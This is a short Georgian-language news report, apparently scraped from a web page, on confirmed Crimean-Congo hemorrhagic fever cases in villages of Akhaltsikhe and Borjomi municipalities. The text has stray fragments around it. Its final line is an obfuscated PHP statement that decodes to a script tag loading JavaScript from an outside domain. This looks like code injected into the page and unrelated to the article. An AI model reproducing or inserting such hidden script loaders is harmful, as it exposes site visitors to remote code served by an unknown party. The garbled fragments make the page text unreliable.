celsiusi
ავერსი შნაიდერი
ახალციხის მუნიციპალიტეტის სოფელ წყრუთში, ყირიმ-კონგოს ჰემორაგიული ცხელება ორ პირს, ბორჯომის მუნიციპალიტეტის სოფელ საკირეში კი ერთ პირს დაუდასტურდა - ამის შესახებ ინფორმაციას "სამხრეთის კარიბჭე" ავრცელებს. 
 
დაავადებათა კონტროლის ეროვნული ცენტრის, სამცხე–ჯავახეთის განყოფილების უფროსის ინფორმაციით, მიმდინარე წელს, ბორჯომის მუნიციპალიტეტში, ყირიმ–კონგოს ჰემორაგიული ცხელებით ინფიცირების პირველი შემთხვევა გამოვლინდა. ინფექცია, სოფელ საკირეში მცხოვრებ 1977 წელს დაბადებულ კაცს დაუდასტურდა.
 
რაც შეეხება სოფელ წყრუთში მცხოვრებ ორ ინფიცირებულს, მათგან ერთი 1959 წელს დაბადებული ქალია, მეორე კი 1956 წელს დაბადებული კაცი.
 
2022 წელს, სამცხე–ჯავახეთში, ინფექციით დაავადებულების რიცხვი 36-მდე გაიზარდა. "სამხრეთის კარიბჭეს" ინფორმაციით, მიმდინარე წელს ყირიმ-კონგოთი ერთი ადამიანი გარდაიცვალა. 
490
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");